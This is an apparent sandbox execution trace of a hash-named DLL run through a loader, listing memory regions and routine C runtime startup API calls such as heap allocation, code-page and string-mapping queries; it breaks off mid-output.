region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3138 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3139 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3140 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3141 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3142 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3143 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3144 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3145 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3146 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3147 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3148 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3149 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3150 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3151 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3152 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3153 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3154 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3155 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3156 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3157 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3158 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3159 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3160 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3161 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3162 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3163 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3164 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3166 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3167 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3168 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3169 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3170 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3171 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3172 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3173 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3174 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3175 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3176 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3177 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3178 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3179 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3180 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3181 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3182 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3183 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3184 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3185 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3186 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3187 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3188 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3189 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3190 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3191 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3192 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3193 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3194 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3195 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3196 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3197 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3198 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3199 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3200 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3201 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3202 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4290 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 4291 start_va = 0x1b0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 4292 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4293 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Thread: id = 36 os_tid = 0xee0 [0111.135] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0111.135] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0111.135] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0111.135] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0111.135] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0111.136] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0111.136] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0111.137] GetProcessHeap () returned 0x430000 [0111.137] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0111.137] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0111.137] GetLastError () returned 0x7e [0111.137] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0111.137] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0111.137] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3c8) returned 0x43c320 [0111.138] SetLastError (dwErrCode=0x7e) [0111.138] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1200) returned 0x443470 [0111.140] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0111.140] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0111.140] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0111.140] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0111.140] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_codec_set_threads" [0111.140] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_codec_set_threads" [0111.140] GetACP () returned 0x4e4 [0111.140] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x228) returned 0x434f20 [0111.140] IsValidCodePage (CodePage=0x4e4) returned 1 [0111.140] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0111.140] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0111.140] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0111.141] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0111.141] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0111.141] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0111.141] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0111.141] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0111.141] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0111.141] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0111.141] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0111.141] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0111.141] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0111.141] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0111.141] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0111.141] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0111.141] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 